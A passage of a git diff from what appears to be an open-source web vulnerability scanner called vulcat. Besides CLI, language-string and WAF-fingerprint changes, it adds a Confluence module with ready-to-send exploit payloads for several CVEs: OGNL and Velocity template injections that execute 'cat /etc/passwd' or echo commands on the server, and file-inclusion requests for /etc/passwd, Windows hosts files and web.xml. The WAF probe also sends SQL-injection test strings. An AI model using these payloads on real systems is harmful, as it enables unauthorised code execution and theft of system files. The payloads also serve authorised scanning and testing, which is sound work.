- operation = input('\r'.ljust(70)) # * 接收参数
- if operation == 'q': # * 退出
+ logger.info('reset', '', print_end='') # ? 提示信息
+ operation = input('\r[CTRL+C] - q(uit)/c(ontinue)/n(ext)/wq(save and exit): '.ljust(70))# * 接收参数
+ operation = operation.lower() # * 字母转小写
+
+ if operation in ['q', 'quit']: # * 退出扫描
_exit(0)
- elif operation == 'c': # * 继续扫描
+ elif operation in ['c', 'continue']: # * 继续扫描
logger.info('yellow_ex', self.lang['core']['stop']['continue']) # ? 日志, 继续扫描
return True
- elif operation == 'wq': # * 保存退出
+ elif operation in ['wq', 'save and exit']: # * 保存结果并退出
self.end()
+ elif operation in ['n', 'next']:
+ logger.info('yellow_ex', self.lang['core']['stop']['next']) # ? 日志, 扫描下一个目标
+
+ return False
def end(self):
''' 结束扫描, 等待所有线程运行完毕, 生成漏洞结果并输出/保存'''
diff --git a/lib/initial/config.py b/lib/initial/config.py
index 1780e68..26548e4 100644
--- a/lib/initial/config.py
+++ b/lib/initial/config.py
@@ -77,7 +77,7 @@ def __init__(self, args):
'https': args.http_proxy
}
- app_list = ['alidruid', 'airflow', 'apisix', 'appweb', 'cisco', 'django', 'f5bigip', 'fastjson', 'flink', 'keycloak', 'nacos', 'solr', 'struts2', 'spring', 'thinkphp', 'tomcat', 'ueditor', 'weblogic', 'yonyou']
+ app_list = ['alidruid', 'airflow', 'apisix', 'appweb', 'cisco', 'confluence', 'django', 'elasticsearch', 'f5bigip', 'fastjson', 'flink', 'keycloak', 'nacos', 'solr', 'struts2', 'spring', 'thinkphp', 'tomcat', 'ueditor', 'weblogic', 'yonyou']
if args.application == 'all': # * -a参数
args.app_list = app_list
else:
diff --git a/lib/initial/language.py b/lib/initial/language.py
index 242cc0e..68e3947 100644
--- a/lib/initial/language.py
+++ b/lib/initial/language.py
@@ -47,6 +47,12 @@ def language():
'output_text': 'Save the scan results in TXT format, no vulnerability will not generate files(e.g. --output-text result.txt)',
'output_json': 'Save the scan results in JSON format, no vulnerability will not generate files(e.g. --output-text result.json)'
},
+ 'general_help': {
+ 'title': 'General',
+ 'name': 'General operating parameter',
+ 'no_waf': 'Disable WAF detection',
+ 'batch': 'The yes/no option does not require user input. The default option is used'
+ },
'lists_help': {
'title': 'Lists',
'name': 'Vulnerability list',
@@ -54,19 +60,26 @@ def language():
},
'app_list_help': {
'title': 'Supported target types(Case insensitive)',
- 'name': 'AliDruid,airflow,apisix,appweb,cisco,django,f5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyou'
+ 'name': 'AliDruid,airflow,apisix,appweb,cisco,confluence,django,elasticsearch,f5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyou'
},
'core': {
'start': {
'start': '[INFO] Start scanning target ',
- 'unable': '[WARN] Unable to connect to '
+ 'unable': '[WARN] Unable to connect to ',
+ 'waf': '[WAF] The WAF detection for the current URL starts',
+ 'waf_find': '[WAF] {} is detected, Whether to continue scanning the current URL? - y(es)/N(o): ',
+ 'waf_not_find': 'Not found the WAF',
+ 'waf_timeout': 'WAF recognizes timeout and the target is not responding',
+ 'waf_conn_error': 'WAF recognition error, unable to connect to destination URL',
+ 'waf_error': 'WAF identification error, unknown error'
},
'addpoc': {
'notfound': '[ERROR] The application not found: ',
'error': '[ERROR] The addPOC is error'
},
'stop': {
- 'continue': '[INFO] Continue to scan'
+ 'continue': '[INFO] Continue to scan',
+ 'next': '[INFO] Skip current URL'
},
'end': {
'wait': '[INFO] Wait for all threads to finish. Please wait...',
@@ -126,6 +139,12 @@ def language():
'output_text': '以txt格式保存扫描结果, 无漏洞时不会生成文件(如: --output-text result.txt)',
'output_json': '以json格式保存扫描结果, 无漏洞时不会生成文件(如: --output-text result.json)'
},
+ 'general_help': {
+ 'title': 'General',
+ 'name': '通用工作参数',
+ 'no_waf': '禁用waf检测',
+ 'batch': 'yes/no的选项不需要用户输入, 使用默认选项'
+ },
'lists_help': {
'title': 'Lists',
'name': '漏洞列表',
@@ -133,19 +152,26 @@ def language():
},
'app_list_help': {
'title': '支持的目标类型(-a参数, 不区分大小写)',
- 'name': 'AliDruid,airflow,apisix,appweb,cisco,django,f5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyou'
+ 'name': 'AliDruid,airflow,apisix,appweb,cisco,confluence,django,elasticsearch,f5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyou'
},
'core': {
'start': {
'start': '[INFO] 开始扫描目标 ',
- 'unable': '[WARN] 无法连接到 '
+ 'unable': '[WARN] 无法连接到 ',
+ 'waf': '[WAF] 开始对当前url进行WAF检测',
+ 'waf_find': '[WAF] 目标疑似存在{} 是否继续扫描当前url? - y(es)/N(o): ',
+ 'waf_not_find': '[WAF] 未发现WAF',
+ 'waf_timeout': 'WAF识别超时, 目标没有响应',
+ 'waf_conn_error': 'WAF识别出错, 无法连接至目标url',
+ 'waf_error': 'WAF识别出错, 未知错误'
},
'addpoc': {
'notfound': '[ERROR] 未找到应用程序: ',
'error': '[ERROR] 添加POC时出现错误'
},
'stop': {
- 'continue': '[INFO] 继续扫描'
+ 'continue': '[INFO] 继续扫描',
+ 'next': '[INFO] 跳过当前url'
},
'end': {
'wait': '[INFO] 等待所有线程结束, 请稍等...',
diff --git a/lib/initial/list.py b/lib/initial/list.py
index 126b3cb..c75703c 100644
--- a/lib/initial/list.py
+++ b/lib/initial/list.py
@@ -6,20 +6,23 @@
def list():
''' 显示漏洞列表 '''
+ vul_num = 0
vul_list = ''
- vul_list += '+' + ('-'*15) + '+' + ('-'*18) + '+' + ('-'*12) + '+' + ('-'*10) + '+' + ('-'*60) + '+\n'
+ vul_list += '+' + ('-'*22) + '+' + ('-'*18) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*67) + '+\n'
for vul in vul_info:
for info in vul_info[vul]:
- vul_list += '| {}|'.format(vul.ljust(14))
+ vul_num += 1
+ vul_list += '| {}|'.format(vul.ljust(21))
vul_list += ' {}|'.format(info['vul_id'].ljust(17))
- vul_list += ' {}|'.format(info['type'].ljust(11))
+ vul_list += ' {}|'.format(info['type'].ljust(13))
vul_list += ' {}|'.format(info['method'].ljust(9))
- vul_list += ' {}\t|'.format(info['description'].ljust(49))
+ vul_list += ' {}\t|'.format(info['description'].ljust(56))
vul_list += '\n'
- vul_list += '+' + ('-'*15) + '+' + ('-'*18) + '+' + ('-'*12) + '+' + ('-'*10) + '+' + ('-'*60) + '+\n'
+ vul_list += '+' + ('-'*22) + '+' + ('-'*18) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*67) + '+\n'
- print(color.cyan(vul_list))
+ print(color.cyan(vul_list + str(vul_num - 1)))
+ # print(vul_num)
sys.exit(0)
vul_info = {
@@ -31,7 +34,7 @@ def list():
'description': 'Description\t'
}
],
- 'AlibabaDruid': [
+ 'Alibaba Druid': [
{
'vul_id': 'None',
'type': 'unAuth',
@@ -39,7 +42,7 @@ def list():
'description': '阿里巴巴Druid未授权访问'
}
],
- 'AlibabaNacos': [
+ 'Alibaba Nacos': [
{
'vul_id': 'CVE-2021-29441',
'type': 'unAuth',
@@ -47,7 +50,7 @@ def list():
'description': '阿里巴巴Nacos未授权访问'
}
],
- 'ApacheAirflow': [
+ 'Apache Airflow': [
{
'vul_id': 'CVE-2020-17526',
'type': 'unAuth',
@@ -55,7 +58,7 @@ def list():
'description': 'Airflow身份验证绕过'
}
],
- 'ApacheAPISIX': [
+ 'Apache APISIX': [
{
'vul_id': 'CVE-2020-13945',
'type': 'unAuth',
@@ -63,7 +66,7 @@ def list():
'description': 'Apache APISIX默认密钥'
}
],
- 'ApacheFlink': [
+ 'Apache Flink': [
{
'vul_id': 'CVE-2020-17519',
'type': 'FileRead',
@@ -71,7 +74,7 @@ def list():
'description': 'Flink目录遍历'
}
],
- 'ApacheSolr': [
+ 'Apache Solr': [
{
'vul_id': 'CVE-2021-27905',
'type': 'SSRF',
@@ -79,7 +82,7 @@ def list():
'description': 'Solr SSRF/任意文件读取'
}
],
- 'ApacheStruts2': [
+ 'Apache Struts2': [
{
'vul_id': 'S2-001',
'type': 'RCE',
@@ -117,7 +120,7 @@ def list():
'description': 'Struts2远程代码执行'
}
],
- 'ApacheTomcat': [
+ 'Apache Tomcat': [
{
'vul_id': 'CVE-2017-12615',
'type': 'FileUpload',
@@ -133,6 +136,32 @@ def list():
'description': 'AppWeb身份认证绕过'
}
],
+ 'Atlassian Confluence': [
+ {
+ 'vul_id': 'CVE-2015-8399',
+ 'type': 'FileRead',
+ 'method': 'GET',
+ 'description': 'Confluence任意文件包含'
+ },
+ {
+ 'vul_id': 'CVE-2019-3396',
+ 'type': 'RCE/FileRead',
+ 'method': 'POST',
+ 'description': 'Confluence路径遍历和命令执行'
+ },
+ {
+ 'vul_id': 'CVE-2021-26084',
+ 'type': 'RCE',
+ 'method': 'POST',
+ 'description': 'Confluence Webwork Pre-Auth OGNL表达式命令注入'
+ },
+ {
+ 'vul_id': 'CVE-2022-26134',
+ 'type': 'RCE',
+ 'method': 'GET',
+ 'description': 'Confluence远程代码执行'
+ }
+ ],
'Cisco': [
{
'vul_id': 'CVE-2020-3580',
@@ -148,18 +177,18 @@ def list():
'method': 'GET',
'description': 'debug page XSS跨站脚本攻击'
},
- {
- 'vul_id': 'CVE-2019-14234',
- 'type': 'SQLinject',
- 'method': 'GET',
- 'description': 'JSONfield SQL注入'
- },
{
'vul_id': 'CVE-2018-14574',
'type': 'Redirect',
'method': 'GET',
'description': 'CommonMiddleware url重定向'
},
+ {
+ 'vul_id': 'CVE-2019-14234',
+ 'type': 'SQLinject',
+ 'method': 'GET',
+ 'description': 'JSONfield SQL注入'
+ },
{
'vul_id': 'CVE-2020-9402',
'type': 'SQLinject',
@@ -173,7 +202,33 @@ def list():
'description': 'QuerySet.order_by SQL注入'
}
],
- 'F5-BIG-IP': [
+ 'ElasticSearch': [
+ {
+ 'vul_id': 'CVE-2014-3120',
+ 'type': 'RCE',
+ 'method': 'POST',
+ 'description': 'ElasticSearch命令执行'
+ },
+ {
+ 'vul_id': 'CVE-2015-1427',
+ 'type': 'RCE',
+ 'method': 'POST',
+ 'description': 'ElasticSearch Groovy 沙盒绕过&&代码执行'
+ },
+ {
+ 'vul_id': 'CVE-2015-3337',
+ 'type': 'FileRead',
+ 'method': 'GET',
+ 'description': 'ElasticSearch 目录穿越'
+ },
+ {
+ 'vul_id': 'CVE-2015-5531',
+ 'type': 'FileRead',
+ 'method': 'PUT/GET',
+ 'description': 'ElasticSearch 目录穿越'
+ },
+ ],
+ 'F5 BIG-IP': [
{
'vul_id': 'CVE-2020-5902',
'type': 'RCE',
@@ -189,16 +244,16 @@ def list():
],
'Fastjson': [
{
- 'vul_id': 'CNVD-2019-22238',
+ 'vul_id': 'CNVD-2017-02833',
'type': 'unSerialize',
'method': 'POST',
- 'description': 'Fastjson <= 1.2.47 反序列化'
+ 'description': 'Fastjson <= 1.2.24 反序列化'
},
{
- 'vul_id': 'CVE-2017-18349',
+ 'vul_id': 'CNVD-2019-22238',
'type': 'unSerialize',
'method': 'POST',
- 'description': 'Fastjson <= 1.2.24 反序列化'
+ 'description': 'Fastjson <= 1.2.47 反序列化'
}
],
'Keycloak': [
@@ -211,10 +266,10 @@ def list():
],
'Spring': [
{
- 'vul_id': 'CVE-2022-22965',
- 'type': 'RCE',
- 'method': 'GET/POST',
- 'description': 'Spring Framework远程代码执行'
+ 'vul_id': 'CVE-2020-5410',
+ 'type': 'FileRead',
+ 'method': 'GET',
+ 'description': 'Spring Cloud目录遍历'
},
{
'vul_id': 'CVE-2021-21234',
@@ -223,10 +278,10 @@ def list():
'description': 'Spring Boot目录遍历'
},
{
- 'vul_id': 'CVE-2020-5410',
- 'type': 'FileRead',
- 'method': 'GET',
- 'description': 'Spring Cloud目录遍历'
+ 'vul_id': 'CVE-2022-22947',
+ 'type': 'RCE',
+ 'method': 'POST',
+ 'description': 'Spring Cloud Gateway SpEl远程代码执行'
},
{
'vul_id': 'CVE-2022-22963',
@@ -235,13 +290,19 @@ def list():
'description': 'Spring Cloud Function SpEL远程代码执行'
},
{
- 'vul_id': 'CVE-2022-22947',
+ 'vul_id': 'CVE-2022-22965',
'type': 'RCE',
- 'method': 'POST',
- 'description': 'Spring Cloud Gateway SpEl远程代码执行'
+ 'method': 'GET/POST',
+ 'description': 'Spring Framework远程代码执行'
}
],
'ThinkPHP': [
+ {
+ 'vul_id': 'CVE-2018-1002015',
+ 'type': 'RCE',
+ 'method': 'GET',
+ 'description': 'ThinkPHP5.x 远程代码执行'
+ },
{
'vul_id': 'CNVD-2018-24942',
'type': 'RCE',
@@ -275,18 +336,18 @@ def list():
'description': 'Ueditor编辑器SSRF'
}
],
- 'Weblogic': [
+ 'Oracle Weblogic': [
{
- 'vul_id': 'CVE-2020-14882',
- 'type': 'RCE',
+ 'vul_id': 'CVE-2014-4210',
+ 'type': 'SSRF',
'method': 'GET',
- 'description': 'Weblogic 未授权命令执行'
+ 'description': 'Weblogic 服务端请求伪造'
},
{
- 'vul_id': 'CVE-2020-14750',
- 'type': 'unAuth',
- 'method': 'GET',
- 'description': 'Weblogic 权限验证绕过'
+ 'vul_id': 'CVE-2017-10271',
+ 'type': 'unSerialize',
+ 'method': 'POST',
+ 'description': 'Weblogic XMLDecoder反序列化'
},
{
'vul_id': 'CVE-2019-2725',
@@ -295,16 +356,16 @@ def list():
'description': 'Weblogic wls9_async反序列化'
},
{
- 'vul_id': 'CVE-2017-10271',
- 'type': 'unSerialize',
- 'method': 'POST',
- 'description': 'Weblogic XMLDecoder反序列化'
+ 'vul_id': 'CVE-2020-14750',
+ 'type': 'unAuth',
+ 'method': 'GET',
+ 'description': 'Weblogic 权限验证绕过'
},
{
- 'vul_id': 'CVE-2014-4210',
- 'type': 'SSRF',
+ 'vul_id': 'CVE-2020-14882',
+ 'type': 'RCE',
'method': 'GET',
- 'description': 'Weblogic 服务端请求伪造'
+ 'description': 'Weblogic 未授权命令执行'
}
],
'Yonyou': [
diff --git a/lib/initial/parse.py b/lib/initial/parse.py
index 521ba05..362261c 100644
--- a/lib/initial/parse.py
+++ b/lib/initial/parse.py
@@ -18,7 +18,7 @@ def parse():
python3 vulcat.py -u https://www.example.com/ -a thinkphp --log 3
python3 vulcat.py -f url.txt -t 10
python3 vulcat.py --list
-''', version='vulcat.py-1.0.7\n')
+''', version='vulcat.py-1.0.9\n')
# * 指定目标
target = parser.add_option_group(lang['target_help']['title'], lang['target_help']['name'])
target.add_option('-u', '--url', type='string', dest='url', default=None, help=lang['target_help']['url'])
@@ -48,6 +48,12 @@ def parse():
save.add_option('--output-text', type='string', dest='txt_filename',default=None, help=lang['save_help']['output_text'])
save.add_option('--output-json', type='string', dest='json_filename',default=None, help=lang['save_help']['output_json'])
+ # * 通用参数
+ general = parser.add_option_group(lang['general_help']['title'], lang['general_help']['name'])
+ general.add_option('--no-waf', dest='no_waf', action='store_true', help=lang['general_help']['no_waf'])
+ # general.add_option('--no-webapp', dest='no_webapp', action='store_true', help='')
+ general.add_option('--batch', dest='batch', action='store_true', help=lang['general_help']['batch'])
+
# * 查看漏洞列表
lists = parser.add_option_group(lang['lists_help']['title'], lang['lists_help']['name'])
lists.add_option('--list', dest='list', help=lang['lists_help']['list'], action='store_true')
diff --git a/lib/tool/check.py b/lib/tool/check.py
index 0e4724a..ea658d2 100644
--- a/lib/tool/check.py
+++ b/lib/tool/check.py
@@ -41,7 +41,7 @@ def check_res(res, md):
''' 检查poc误报
来自: https://github.com/zhzyker/vulmap/blob/main/core/verify.py
'''
- res_info = "echo.{0,10}" + md
+ res_info = "echo.{0,20}" + md
if(re.search(res_info, res) != None):
return "not_vul"
else:
diff --git a/lib/tool/fingerprint.py b/lib/tool/fingerprint.py
index 56b2f5b..81e9278 100644
--- a/lib/tool/fingerprint.py
+++ b/lib/tool/fingerprint.py
@@ -1,15 +1,183 @@
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
-''' 还没写好, 敬请期待
+'''
+ web应用程序防火墙 指纹识别
+ 参考-1: https://mp.weixin.qq.com/s/8F060FU9g_78z57UKS-JsQ
- 用于web指纹识别
- Used for Web fingerprint identification
+ web应用程序/框架 指纹识别
+ 敬请期待
'''
-def fingerprint():
- pass
+from lib.initial.config import config
+from lib.tool.logger import logger
+from lib.tool import check
+from thirdparty import requests
+from time import sleep
+
+class Identify():
+ def webapp_identify(self):
+ '''
+ web应用程序/框架识别
+ '''
+
+
+ def waf_identify(self, url):
+ '''
+ waf识别
+ '''
+ try:
+ vul_info = {
+ 'app_name': 'WAF',
+ 'vul_id': 'identify'
+ }
+ path_1 = '?id=1 and 1=1 -- qwe'
+ path_2 = '?id=1\'">//'
+
+ url_1 = url + path_1
+ url_2 = url + path_2
+
+ logger.info('yellow_ex', self.lang['core']['start']['waf'])
+
+ res = requests.get(
+ url_2,
+ timeout=self.timeout,
+ headers=self.headers,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+
+ res.encoding = 'utf-8'
+ for waf_fp in self.waf_fingerprint:
+ for finger in waf_fp['fingerprint']:
+ # if ((res.status_code == waf_fp['status_code']) and (finger in res.text)):
+ if (finger in res.text):
+ return waf_fp['name']
+
+ return None
+ except requests.ConnectTimeout:
+ logger.info('red_ex', self.lang['core']['start']['waf_timeout'])
+ return None
+ except requests.ConnectionError:
+ logger.logging('red_ex', self.lang['core']['start']['waf_conn_error'])
+ return None
+ except:
+ logger.logging('red_ex', self.lang['core']['start']['waf_error'])
+ return None
+
+
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+ self.lang = config.get('lang')
+
+ # * webapp指纹库
+ self.webapp_fingerprint = [
+ '敬请期待'
+ ]
+ # * waf指纹库
+ self.waf_fingerprint = [
+ {
+ 'name': '阿里云盾(Aliyun Waf)',
+ 'status_code': 405,
+ 'fingerprint': [
+ '很抱歉,由于您访问的URL有可能对网站造成安全威胁,您的访问被阻断',
+ 'your request has been blocked as it may cause potential threats to the server'
+ ]
+ },
+ {
+ 'name': '腾讯云盾(Tencent WAF)',
+ 'status_code': 403,
+ 'fingerprint': [
+ '腾讯T-Sec Web应用防火墙(WAF)',
+ # '很抱歉,您提交的请求可能对网站造成威胁,请求已被管理员设置的策略阻断'
+ ]
+ },
+ {
+ 'name': '安全狗(SafeDog)',
+ 'status_code': None,
+ 'fingerprint': [
+ '如果您是网站管理员,请登录安全狗',
+ '您的请求带有不合法参数,已被网站管理员设置拦截'
+ ]
+ },
+ {
+ 'name': '华为云盾(HuaWei WAF)',
+ 'status_code': 418,
+ 'fingerprint': [
+ '您的请求疑似攻击行为'
+ ]
+ },
+ {
+ 'name': '网宿云盾',
+ 'status_code': None,
+ 'fingerprint': [
+ '您当前的访问行为存在异常,请稍后重试'
+ ]
+ },
+ {
+ 'name': '创宇盾',
+ 'status_code': None,
+ 'fingerprint': [
+ '当前访问疑似黑客攻击,已被创宇盾拦截',
+ '最近有可疑的攻击行为,请稍后重试'
+ ]
+ },
+ {
+ 'name': '玄武盾',
+ 'status_code': None,
+ 'fingerprint': [
+ '您的访问可能对网站造成危险,已被云防护安全拦截'
+ ]
+ },
+ # {
+ # 'name': '360网站卫士',
+ # 'status_code': None,
+ # 'fingerprint': [
+ # '当前访问可能对网站安全造成威胁,已被网站卫士拦截'
+ # ]
+ # },
+ # {
+ # 'name': '奇安信网站卫士 ',
+ # 'status_code': 493,
+ # 'fingerprint': [
+ # '抱歉!您的访问可能对网站造成威胁,已被云防护拦截'
+ # ]
+ # },
+ {
+ 'name': '长亭SafeLine',
+ 'status_code': 403,
+ 'fingerprint': [
+ '您的访问请求可能对网站造成安全威胁,请求已被 长亭 SafeLine 阻断'
+ ]
+ },
+ {
+ 'name': 'OpenRASP',
+ 'status_code': 400,
+ 'fingerprint': [
+ 'Request blocked by OpenRASP',
+ '您的请求包含恶意行为,已被服务器拒绝'
+ ]
+ },
+ {
+ 'name': '西部数码云网盾',
+ 'status_code': None,
+ 'fingerprint': [
+ '检测到疑似攻击行为,访问已被云网盾拦截',
+ '系统检查到您的访问存在疑似攻击的行为,已经自动列入禁止名单'
+ ]
+ },
+ # {
+ # 'name': '',
+ # 'status_code': 403,
+ # 'fingerprint': [
+ # ''
+ # ]
+ # }
+ ]
-def identify():
- pass
\ No newline at end of file
+identify = Identify()
\ No newline at end of file
diff --git a/lib/tool/head.py b/lib/tool/head.py
new file mode 100644
index 0000000..44693ef
--- /dev/null
+++ b/lib/tool/head.py
@@ -0,0 +1,16 @@
+#!/usr/bin/env /python3
+# -*- coding:utf-8 -*-
+
+'''
+ Headers请求头处理
+ 合并2个headers
+'''
+
+def merge(old_headers, new_headers):
+ '''
+ 用于合并2个headers, 并返回合并后的headers, 新headers将会覆盖旧headers中的同名内容.
+ '''
+
+ merge_headers = old_headers.copy()
+ merge_headers.update(new_headers)
+ return merge_headers
\ No newline at end of file
diff --git a/lib/tool/logger.py b/lib/tool/logger.py
index 34aabd5..254f1e0 100644
--- a/lib/tool/logger.py
+++ b/lib/tool/logger.py
@@ -91,6 +91,7 @@ def logging_5(self, vul_info, status_code, res):
def logging_6(self, vul_info, status_code, res):
''' 日志6级, (框架名称+状态码+漏洞编号)+请求包+响应头+响应内容 '''
+ res.encoding = 'utf-8'
info_6 = self.logging_5(vul_info, status_code, res)
try:
info_6 = info_6[:-1]
diff --git a/payloads/AtlassianConfluence.py b/payloads/AtlassianConfluence.py
new file mode 100644
index 0000000..1d4d67a
--- /dev/null
+++ b/payloads/AtlassianConfluence.py
@@ -0,0 +1,386 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ Atlassian Confluence扫描类:
+ 1. Confluence路径遍历和命令执行
+ CVE-2019-3396
+ Payload: https://vulhub.org/#/environments/confluence/CVE-2019-3396/
+
+ 2. Confluence Server Webwork Pre-Auth OGNL表达式命令注入
+ CVE-2021-26084
+ Payload: https://vulhub.org/#/environments/confluence/CVE-2021-26084/
+
+ 3. Confluence任意文件包含
+ CVE-2015-8399
+ Payload: https://blog.csdn.net/caiqiiqi/article/details/106004003
+
+ 4. Confluence远程代码执行
+ CVE-2022-26134
+ Payload: https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134
+
+file:///etc/passwd
+file:///C:\Windows\System32\drivers\etc\hosts
+file:///C:/Windows/System32/drivers/etc/hosts
+'''
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from lib.tool import head
+from thirdparty import requests
+from time import sleep
+
+class AtlassianConfluence():
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers').copy()
+ self.proxies = config.get('proxies')
+
+ self.app_name = 'AtlassianConfluence'
+ self.md = md5(self.app_name)
+ self.cmd = 'echo ' + self.md
+
+ self.cve_2019_3396_payloads = [
+ # { # * 用于命令执行, 需要将payload保存至.vm文件中, 然后加载远程文件
+ # 'path': 'rest/tinymce/1/macro/preview',
+ # 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.example.com/v/123456", "width": "1000"," height": "1000","_template":"https://www.example.com/confluence.vm","command":' + self.cmd + '}}}',
+ # 'headers': self.headers.update({
+ # 'Content-Type': 'application/json; charset=utf-8'
+ # })
+ # },
+ {
+ 'path': 'rest/tinymce/1/macro/preview',
+ 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///etc/passwd"}}}',
+ 'headers': head.merge(self.headers, {'Content-Type': 'application/json; charset=utf-8'})
+ },
+ {
+ 'path': 'rest/tinymce/1/macro/preview',
+ 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///C:\Windows\System32\drivers\etc\hosts"}}}',
+ 'headers': head.merge(self.headers, {'Content-Type': 'application/json; charset=utf-8'})
+ },
+ {
+ 'path': 'rest/tinymce/1/macro/preview',
+ 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///C:/Windows/System32/drivers/etc/hosts"}}}',
+ 'headers': head.merge(self.headers, {'Content-Type': 'application/json; charset=utf-8'})
+ },
+ {
+ 'path': 'rest/tinymce/1/macro/preview',
+ 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"../web.xml"}}}',
+ 'headers': head.merge(self.headers, {'Content-Type': 'application/json; charset=utf-8'})
+ }
+ ]
+
+ self.cve_2021_26084_payloads = [
+ {
+ 'path': 'pages/doenterpagevariables.action',
+ 'data': 'queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022cat%20/etc/passwd%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': 'pages/doenterpagevariables.action',
+ 'data': 'queryString=%5cu0027%2b%7b555*666%7d%2b%5cu0027',
+ 'headers': head.merge(self.headers, {})
+ }
+ ]
+
+ self.cve_2015_8399_payloads = [
+ {
+ 'path': 'viewdefaultdecorator.action?decoratorName=file:///etc/passwd',
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': 'viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts',
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': 'viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts',
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': 'viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml',
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
+ },
+ # {
+ # 'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///etc/passwd',
+ # 'data': '',
+ # 'headers': head.merge(self.headers, {})
+ # },
+ # {
+ # 'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts',
+ # 'data': '',
+ # 'headers': head.merge(self.headers, {})
+ # },
+ # {
+ # 'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts',
+ # 'data': '',
+ # 'headers': head.merge(self.headers, {})
+ # },
+ # {
+ # 'path': 'spaces/viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml',
+ # 'data': '',
+ # 'headers': head.merge(self.headers, {})
+ # }
+ ]
+
+ self.cve_2022_26134_payloads = [
+ {
+ 'path': '%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22echo%20{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/'.format(self.md),
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
+ }
+ ]
+
+ def cve_2019_3396_scan(self, url):
+ ''' Atlassian Confluence 6.14.2 版本之前存在未经授权的目录遍历漏洞,
+ 攻击者可以使用 Velocity 模板注入读取任意文件或执行任意命令
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE/FileRead'
+ vul_info['vul_id'] = 'CVE-2019-3396'
+ vul_info['vul_method'] = 'POST'
+
+ for payload in self.cve_2019_3396_payloads:
+ path = payload['path']
+ data = payload['data']
+ headers = payload['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ headers['Referer'] = 'http://' + logger.get_domain(url) # * Referer头, Confluence有时会有XSRF检测, 必须是目标的Host才行
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
